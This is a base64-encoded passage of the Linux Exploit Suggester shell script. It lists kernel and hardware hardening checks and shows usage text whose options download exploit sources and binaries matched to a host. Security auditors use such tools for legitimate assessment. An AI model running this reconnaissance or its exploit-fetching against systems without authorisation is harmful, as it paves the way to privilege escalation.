ZWMvMjAxNy9xMS8xODQKZXhwbG9pdC1kYjogaHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNDExNTQKRU9GCikKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMjIHNlY3VyaXR5IHJlbGF0ZWQgSFcva2VybmVsIGZlYXR1cmVzCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCm49MAoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKc2VjdGlvbjogTWFpbmxpbmUga2VybmVsIHByb3RlY3Rpb24gbWVjaGFuaXNtczoKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEtlcm5lbCBQYWdlIFRhYmxlIElzb2xhdGlvbiAoUFRJKSBzdXBwb3J0CmF2YWlsYWJsZTogdmVyPj00LjE1CmVuYWJsZWQ6IGNtZDpncmVwIC1FcWkgJ1xzcHRpJyAvcHJvYy9jcHVpbmZvCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvcHRpLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBHQ0Mgc3RhY2sgcHJvdGVjdG9yIHN1cHBvcnQKYXZhaWxhYmxlOiBDT05GSUdfSEFWRV9TVEFDS1BST1RFQ1RPUj15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc3RhY2twcm90ZWN0b3ItcmVndWxhci5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogR0NDIHN0YWNrIHByb3RlY3RvciBTVFJPTkcgc3VwcG9ydAphdmFpbGFibGU6IENPTkZJR19TVEFDS1BST1RFQ1RPUl9TVFJPTkc9eSx2ZXI+PTMuMTQKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zdGFja3Byb3RlY3Rvci1zdHJvbmcubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IExvdyBhZGRyZXNzIHNwYWNlIHRvIHByb3RlY3QgZnJvbSB1c2VyIGFsbG9jYXRpb24KYXZhaWxhYmxlOiBDT05GSUdfREVGQVVMVF9NTUFQX01JTl9BRERSPVswLTldKwplbmFibGVkOiBzeXNjdGw6dm0ubW1hcF9taW5fYWRkciE9MAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL21tYXBfbWluX2FkZHIubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFByZXZlbnQgdXNlcnMgZnJvbSB1c2luZyBwdHJhY2UgdG8gZXhhbWluZSB0aGUgbWVtb3J5IGFuZCBzdGF0ZSBvZiB0aGVpciBwcm9jZXNzZXMKYXZhaWxhYmxlOiBDT05GSUdfU0VDVVJJVFlfWUFNQT15CmVuYWJsZWQ6IHN5c2N0bDprZXJuZWwueWFtYS5wdHJhY2Vfc2NvcGUhPTAKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy95YW1hX3B0cmFjZV9zY29wZS5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogUmVzdHJpY3QgdW5wcml2aWxlZ2VkIGFjY2VzcyB0byBrZXJuZWwgc3lzbG9nCmF2YWlsYWJsZTogQ09ORklHX1NFQ1VSSVRZX0RNRVNHX1JFU1RSSUNUPXksdmVyPj0yLjYuMzcKZW5hYmxlZDogc3lzY3RsOmtlcm5lbC5kbWVzZ19yZXN0cmljdCE9MAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2RtZXNnX3Jlc3RyaWN0Lm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBSYW5kb21pemUgdGhlIGFkZHJlc3Mgb2YgdGhlIGtlcm5lbCBpbWFnZSAoS0FTTFIpCmF2YWlsYWJsZTogQ09ORklHX1JBTkRPTUlaRV9CQVNFPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9rYXNsci5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogSGFyZGVuZWQgdXNlciBjb3B5IHN1cHBvcnQKYXZhaWxhYmxlOiBDT05GSUdfSEFSREVORURfVVNFUkNPUFk9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2hhcmRlbmVkX3VzZXJjb3B5Lm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBNYWtlIGtlcm5lbCB0ZXh0IGFuZCByb2RhdGEgcmVhZC1vbmx5CmF2YWlsYWJsZTogQ09ORklHX1NUUklDVF9LRVJORUxfUldYPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zdHJpY3Rfa2VybmVsX3J3eC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogU2V0IGxvYWRhYmxlIGtlcm5lbCBtb2R1bGUgZGF0YSBhcyBOWCBhbmQgdGV4dCBhcyBSTwphdmFpbGFibGU6IENPTkZJR19TVFJJQ1RfTU9EVUxFX1JXWD15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc3RyaWN0X21vZHVsZV9yd3gubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEJVRygpIGNvbmRpdGlvbnMgcmVwb3J0aW5nCmF2YWlsYWJsZTogQ09ORklHX0JVRz15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvYnVnLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBBZGRpdGlvbmFsICdjcmVkJyBzdHJ1Y3QgY2hlY2tzCmF2YWlsYWJsZTogQ09ORklHX0RFQlVHX0NSRURFTlRJQUxTPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZWJ1Z19jcmVkZW50aWFscy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogU2FuaXR5IGNoZWNrcyBmb3Igbm90aWZpZXIgY2FsbCBjaGFpbnMKYXZhaWxhYmxlOiBDT05GSUdfREVCVUdfTk9USUZJRVJTPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZWJ1Z19ub3RpZmllcnMubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEV4dGVuZGVkIGNoZWNrcyBmb3IgbGlua2VkLWxpc3RzIHdhbGtpbmcKYXZhaWxhYmxlOiBDT05GSUdfREVCVUdfTElTVD15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvZGVidWdfbGlzdC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogQ2hlY2tzIG9uIHNjYXR0ZXItZ2F0aGVyIHRhYmxlcwphdmFpbGFibGU6IENPTkZJR19ERUJVR19TRz15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvZGVidWdfc2cubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IENoZWNrcyBmb3IgZGF0YSBzdHJ1Y3R1cmUgY29ycnVwdGlvbnMKYXZhaWxhYmxlOiBDT05GSUdfQlVHX09OX0RBVEFfQ09SUlVQVElPTj15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvYnVnX29uX2RhdGFfY29ycnVwdGlvbi5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogQ2hlY2tzIGZvciBhIHN0YWNrIG92ZXJydW4gb24gY2FsbHMgdG8gJ3NjaGVkdWxlJwphdmFpbGFibGU6IENPTkZJR19TQ0hFRF9TVEFDS19FTkRfQ0hFQ0s9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3NjaGVkX3N0YWNrX2VuZF9jaGVjay5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogRnJlZWxpc3Qgb3JkZXIgcmFuZG9taXphdGlvbiBvbiBuZXcgcGFnZXMgY3JlYXRpb24KYXZhaWxhYmxlOiBDT05GSUdfU0xBQl9GUkVFTElTVF9SQU5ET009eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3NsYWJfZnJlZWxpc3RfcmFuZG9tLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBGcmVlbGlzdCBtZXRhZGF0YSBoYXJkZW5pbmcKYXZhaWxhYmxlOiBDT05GSUdfU0xBQl9GUkVFTElTVF9IQVJERU5FRD15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc2xhYl9mcmVlbGlzdF9oYXJkZW5lZC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogQWxsb2NhdG9yIHZhbGlkYXRpb24gY2hlY2tpbmcKYXZhaWxhYmxlOiBDT05GSUdfU0xVQl9ERUJVR19PTj15LGNtZDohIGdyZXAgJ3NsdWJfZGVidWc9LScgL3Byb2MvY21kbGluZQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3NsdWJfZGVidWcubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFZpcnR1YWxseS1tYXBwZWQga2VybmVsIHN0YWNrcyB3aXRoIGd1YXJkIHBhZ2VzCmF2YWlsYWJsZTogQ09ORklHX1ZNQVBfU1RBQ0s9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3ZtYXBfc3RhY2subWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFBhZ2VzIHBvaXNvbmluZyBhZnRlciBmcmVlX3BhZ2VzKCkgY2FsbAphdmFpbGFibGU6IENPTkZJR19QQUdFX1BPSVNPTklORz15CmVuYWJsZWQ6IGNtZDogZ3JlcCAncGFnZV9wb2lzb249MScgL3Byb2MvY21kbGluZQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3BhZ2VfcG9pc29uaW5nLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBVc2luZyAncmVmY291bnRfdCcgaW5zdGVhZCBvZiAnYXRvbWljX3QnCmF2YWlsYWJsZTogQ09ORklHX1JFRkNPVU5UX0ZVTEw9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3JlZmNvdW50X2Z1bGwubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEhhcmRlbmluZyBjb21tb24gc3RyL21lbSBmdW5jdGlvbnMgYWdhaW5zdCBidWZmZXIgb3ZlcmZsb3dzCmF2YWlsYWJsZTogQ09ORklHX0ZPUlRJRllfU09VUkNFPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9mb3J0aWZ5X3NvdXJjZS5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogUmVzdHJpY3QgL2Rldi9tZW0gYWNjZXNzCmF2YWlsYWJsZTogQ09ORklHX1NUUklDVF9ERVZNRU09eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3N0cmljdF9kZXZtZW0ubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFJlc3RyaWN0IEkvTyBhY2Nlc3MgdG8gL2Rldi9tZW0KYXZhaWxhYmxlOiBDT05GSUdfSU9fU1RSSUNUX0RFVk1FTT15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvaW9fc3RyaWN0X2Rldm1lbS5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKc2VjdGlvbjogSGFyZHdhcmUtYmFzZWQgcHJvdGVjdGlvbiBmZWF0dXJlczoKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFN1cGVydmlzb3IgTW9kZSBFeGVjdXRpb24gUHJvdGVjdGlvbiAoU01FUCkgc3VwcG9ydAphdmFpbGFibGU6IHZlcj49My4wCmVuYWJsZWQ6IGNtZDpncmVwIC1xaSBzbWVwIC9wcm9jL2NwdWluZm8KYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zbWVwLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTdXBlcnZpc29yIE1vZGUgQWNjZXNzIFByZXZlbnRpb24gKFNNQVApIHN1cHBvcnQKYXZhaWxhYmxlOiB2ZXI+PTMuNwplbmFibGVkOiBjbWQ6Z3JlcCAtcWkgc21hcCAvcHJvYy9jcHVpbmZvCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc21hcC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKc2VjdGlvbjogM3JkIHBhcnR5IGtlcm5lbCBwcm90ZWN0aW9uIG1lY2hhbmlzbXM6CkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBHcnNlY3VyaXR5CmF2YWlsYWJsZTogQ09ORklHX0dSS0VSTlNFQz15CmVuYWJsZWQ6IGNtZDp0ZXN0IC1jIC9kZXYvZ3JzZWMKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFBhWAphdmFpbGFibGU6IENPTkZJR19QQVg9eQplbmFibGVkOiBjbWQ6dGVzdCAteCAvc2Jpbi9wYXhjdGwKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IExpbnV4IEtlcm5lbCBSdW50aW1lIEd1YXJkIChMS1JHKSBrZXJuZWwgbW9kdWxlCmVuYWJsZWQ6IGNtZDp0ZXN0IC1kIC9wcm9jL3N5cy9sa3JnCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvbGtyZy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKc2VjdGlvbjogQXR0YWNrIFN1cmZhY2U6CkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBVc2VyIG5hbWVzcGFjZXMgZm9yIHVucHJpdmlsZWdlZCBhY2NvdW50cwphdmFpbGFibGU6IENPTkZJR19VU0VSX05TPXkKZW5hYmxlZDogc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvdXNlcl9ucy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogVW5wcml2aWxlZ2VkIGFjY2VzcyB0byBicGYoKSBzeXN0ZW0gY2FsbAphdmFpbGFibGU6IENPTkZJR19CUEZfU1lTQ0FMTD15CmVuYWJsZWQ6IHN5c2N0bDprZXJuZWwudW5wcml2aWxlZ2VkX2JwZl9kaXNhYmxlZCE9MQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2JwZl9zeXNjYWxsLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTeXNjYWxscyBmaWx0ZXJpbmcKYXZhaWxhYmxlOiBDT05GSUdfU0VDQ09NUD15CmVuYWJsZWQ6IGNtZDpncmVwIC1pIFNlY2NvbXAgL3Byb2Mvc2VsZi9zdGF0dXMgfCBhd2sgJ3twcmludCBcJDJ9JwphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2JwZl9zeXNjYWxsLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTdXBwb3J0IGZvciAvZGV2L21lbSBhY2Nlc3MKYXZhaWxhYmxlOiBDT05GSUdfREVWTUVNPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZXZtZW0ubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFN1cHBvcnQgZm9yIC9kZXYva21lbSBhY2Nlc3MKYXZhaWxhYmxlOiBDT05GSUdfREVWS01FTT15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvZGV2a21lbS5tZApFT0YKKQoKCnZlcnNpb24oKSB7CiAgICBlY2hvICJsaW51eC1leHBsb2l0LXN1Z2dlc3RlciAiJFZFUlNJT04iLCBtemV0LCBodHRwczovL3otbGFicy5ldSwgTWFyY2ggMjAxOSIKfQoKdXNhZ2UoKSB7CiAgICBlY2hvICJMRVMgdmVyLiAkVkVSU0lPTiAoaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xpbnV4LWV4cGxvaXQtc3VnZ2VzdGVyKSBieSBAX216ZXRfIgogICAgZWNobwogICAgZWNobyAiVXNhZ2U6IGxpbnV4LWV4cGxvaXQtc3VnZ2VzdGVyLnNoIFtPUFRJT05TXSIKICAgIGVjaG8KICAgIGVjaG8gIiAtViB8IC0tdmVyc2lvbiAgICAgICAgICAgICAgIC0gcHJpbnQgdmVyc2lvbiBvZiB0aGlzIHNjcmlwdCIKICAgIGVjaG8gIiAtaCB8IC0taGVscCAgICAgICAgICAgICAgICAgIC0gcHJpbnQgdGhpcyBoZWxwIgogICAgZWNobyAiIC1rIHwgLS1rZXJuZWwgPHZlcnNpb24+ICAgICAgLSBwcm92aWRlIGtlcm5lbCB2ZXJzaW9uIgogICAgZWNobyAiIC11IHwgLS11bmFtZSA8c3RyaW5nPiAgICAgICAgLSBwcm92aWRlICd1bmFtZSAtYScgc3RyaW5nIgogICAgZWNobyAiIC0tc2tpcC1tb3JlLWNoZWNrcyAgICAgICAgICAgLSBkbyBub3QgcGVyZm9ybSBhZGRpdGlvbmFsIGNoZWNrcyAoa2VybmVsIGNvbmZpZywgc3lzY3RsKSB0byBkZXRlcm1pbmUgaWYgZXhwbG9pdCBpcyBhcHBsaWNhYmxlIgogICAgZWNobyAiIC0tc2tpcC1wa2ctdmVyc2lvbnMgICAgICAgICAgLSBza2lwIGNoZWNraW5nIGZvciBleGFjdCB1c2Vyc3BhY2UgcGFja2FnZSB2ZXJzaW9uIChoZWxwcyB0byBhdm9pZCBmYWxzZSBuZWdhdGl2ZXMpIgogICAgZWNobyAiIC1wIHwgLS1wa2dsaXN0LWZpbGUgPGZpbGU+ICAgLSBwcm92aWRlIGZpbGUgd2l0aCAnZHBrZyAtbCcgb3IgJ3JwbSAtcWEnIGNvbW1hbmQgb3V0cHV0IgogICAgZWNobyAiIC0tY3ZlbGlzdC1maWxlIDxmaWxlPiAgICAgICAgLSBwcm92aWRlIGZpbGUgd2l0aCBMaW51eCBrZXJuZWwgQ1ZFcyBsaXN0IgogICAgZWNobyAiIC0tY2hlY2tzZWMgICAgICAgICAgICAgICAgICAgLSBsaXN0IHNlY3VyaXR5IHJlbGF0ZWQgZmVhdHVyZXMgZm9yIHlvdXIgSFcva2VybmVsIgogICAgZWNobyAiIC1zIHwgLS1mZXRjaC1zb3VyY2VzICAgICAgICAgLSBhdXRvbWF0aWNhbGx5IGRvd25sb2FkcyBzb3VyY2UgZm9yIG1hdGNoZWQgZXhwbG9pdCIKICAgIGVjaG8gIiAtYiB8IC0tZmV0Y2gtYmluYXJpZXMgICAgICAgIC0gYXV0b21hdGljYWxseSBkb3dubG9hZHMgYmluYXJ5IGZvciBtYXRjaGVkIGV4cGxvaXQgaWYgYXZhaWxhYmxlIgogICAgZWNobyAiIC1mIHwgLS1mdWxsICAgICAgICAgICAgICAgICAgLSBzaG93IGZ1bGwgaW5mbyBhYm91dCBtYXRjaGVkIGV4cGxvaXQiCiAgICBlY2hvICIgLWcgfCAtLXNob3J0ICAgICAgICAgICAgICAgICAtIHNob3cgc2hvcnRlbiBpbmZvIGFib3V0IG1hdGNoZWQgZXhwbG9pdCIKICAgIGVjaG8gIiAtLWtlcm5lbHNwYWNlLW9ubHkgICAgICAgICAgIC0gc2hvdyBvbmx5IGtlcm5lbCB2dWxuZXJhYmlsaXRpZXMiCiAgICBlY2hvICIgLS11c2Vyc3BhY2Utb25seSAgICAgICAgICAgICAtIHNob3cgb25seSB1c2Vyc3BhY2UgdnVsbmVyYWJpbGl0aWVzIgogICAgZWNobyAiIC1kIHwgLS1zaG93LWRvcyAgICAgICAgICAgICAgLSBzaG93IGFsc28gRG9TZXMgaW4gcmVzdWx0cyIKfQoKZXhpdFdpdGhFcnJNc2coKSB7CiAgICBlY2hvICIkMSIgMT4mMgogICAgZXhpdCAxCn0KCiMgZXh0cmFjdHMgYWxsIGluZm9ybWF0aW9uIGZyb20gb3V0cHV0IG9mICd1bmFtZSAtYScgY29tbWFuZApwYXJzZVVuYW1lKCkgewogICAgbG9jYWwgdW5hbWU9JDEKCiAgICBLRVJORUw9JChlY2hvICIkdW5hbWUiIHwgYXdrICd7cHJpbnQgJDN9JyB8IGN1dCAtZCAnLScgLWYgMSkKICAgIEtFUk5FTF9BTEw9JChlY2hvICIkdW5hbWUiIHwgYXdrICd7cHJpbnQgJDN9JykKICAgIEFSQ0g9JChlY2hvICIkdW5hbWUiIHwgYXdrICd7cHJpbnQgJChORi0xKX0nKQoKICAgIE9TPSIiCiAgICBlY2hvICIkdW5hbWUiIHwgZ3JlcCAtcSAtaSAnZGViJyAmJiBPUz0iZGViaWFuIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ3VidW50dScgJiYgT1M9InVidW50dSIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdcLUFSQ0gnICYmIE9TPSJhcmNoIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ1wtZGVlcGluJyAmJiBPUz0iZGVlcGluIgogICAgZWNobyAiJHVuYW1lIiB8IGdyZXAgLXEgLWkgJ1wtTUFOSkFSTycgJiYgT1M9Im1hbmphcm8iCiAgICBlY2hvICIkdW5hbWUiIHwgZ3JlcCAtcSAtaSAnXC5mYycgJiYgT1M9ImZlZG9yYSIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdcLmVsJyAmJiBPUz0iUkhFTCIKICAgIGVjaG8gIiR1bmFtZSIgfCBncmVwIC1xIC1pICdcLm1nYScgJiYgT1M9Im1hZ2VpYSIKCiAgICAjICd1bmFtZSAtYScgb3V0cHV0IGRvZXNuJ3QgY29udGFpbiBkaXN0cmlidXRpb24gbnVtYmVyIChhdCBsZWFzdCBub3QgaW4gY2FzZSBvZiBhbGwgZGlzdHJvcykKfQoKZ2V0UGtnTGlzdCgpIHsKICAgIGxvY2FsIGRpc3Rybz0kMQogICAgbG9jYWwgcGtnbGlzdF9maWxlPSQyCiAgICAKICAgICMgdGFrZSBwYWNrYWdlIGxpc3RpbmcgZnJvbSBwcm92aWRlZCBmaWxlICYgZGV0ZWN0IGlmIGl0J3MgJ3JwbSAtcWEnIGxpc3Rpbmcgb3IgJ2Rwa2cgLWwnIG9yICdwYWNtYW4gLVEnIGxpc3Rpbmcgb2Ygbm90IHJlY29nbml6ZWQgbGlzdGluZwogICAgaWYgWyAiJG9wdF9wa2dsaXN0X2ZpbGUiID0gInRydWUiIC1hIC1lICIkcGtnbGlzdF9maWxlIiBdOyB0aGVuCgogICAgICAgICMgdWJ1bnR1L2RlYmlhbiBwYWNrYWdlIGxpc3RpbmcgZmlsZQogICAgICAgIGlmIFsgJChoZWFkIC0xICIkcGtnbGlzdF9maWxlIiB8IGdyZXAgJ0Rlc2lyZWQ9VW5rbm93bi9JbnN0YWxsL1JlbW92ZS9QdXJnZS9Ib2xkJykgXTsgdGhlbgogICAgICAgICAgICBQS0dfTElTVD0kKGNhdCAiJHBrZ2xpc3RfZmlsZSIgfCBhd2sgJ3twcmludCAkMiItIiQzfScgfCBzZWQgJ3MvOmFtZDY0Ly9nJykKCiAgICAgICAgICAgIE9TPSJkZWJpYW4iCiAgICAgICAgICAgIFsgIiQoZ3JlcCB1YnVudHUgIiRwa2dsaXN0X2ZpbGUiKSIgXSAmJiBPUz0idWJ1bnR1IgogICAgICAgICMgcmVkaGF0IHBhY2thZ2UgbGlzdGluZyBmaWxlCiAgICAgICAgZWxpZiBbICIkKGdyZXAgLUUgJ1wuZWxbMS05XStbXC5fXScgIiRwa2dsaXN0X2ZpbGUiIHwgaGVhZCAtMSkiIF07IHRoZW4KICAgICAgICAgICAgUEtHX0xJU1Q9JChjYXQgIiRwa2dsaXN0X2ZpbGUiKQogICAgICAgICAgICBPUz0iUkhFTCIKICAgICAgICAjIGZlZG9yYSBwYWNrYWdlIGxpc3RpbmcgZmlsZQogICAgICAgIGVsaWYgWyAiJChncmVwIC1FICdcLmZjWzEtOV0rJ2kgIiRwa2dsaXN0X2ZpbGUiIHwgaGVhZCAtMSkiIF07IHRoZW4KICAgICAgICAgICAgUEtHX0xJU1Q9JChjYXQgIiRwa2dsaXN0X2ZpbGUiKQogICAgICAgICAgICBPUz0iZmVkb3JhIgogICAgICAgICMgbWFnZWlhIHBhY2thZ2UgbGlzdGluZyBmaWxlCiAgICAgICAgZWxpZiBbICIkKGdyZXAgLUUgJ1wubWdhWzEtOV0rJyAi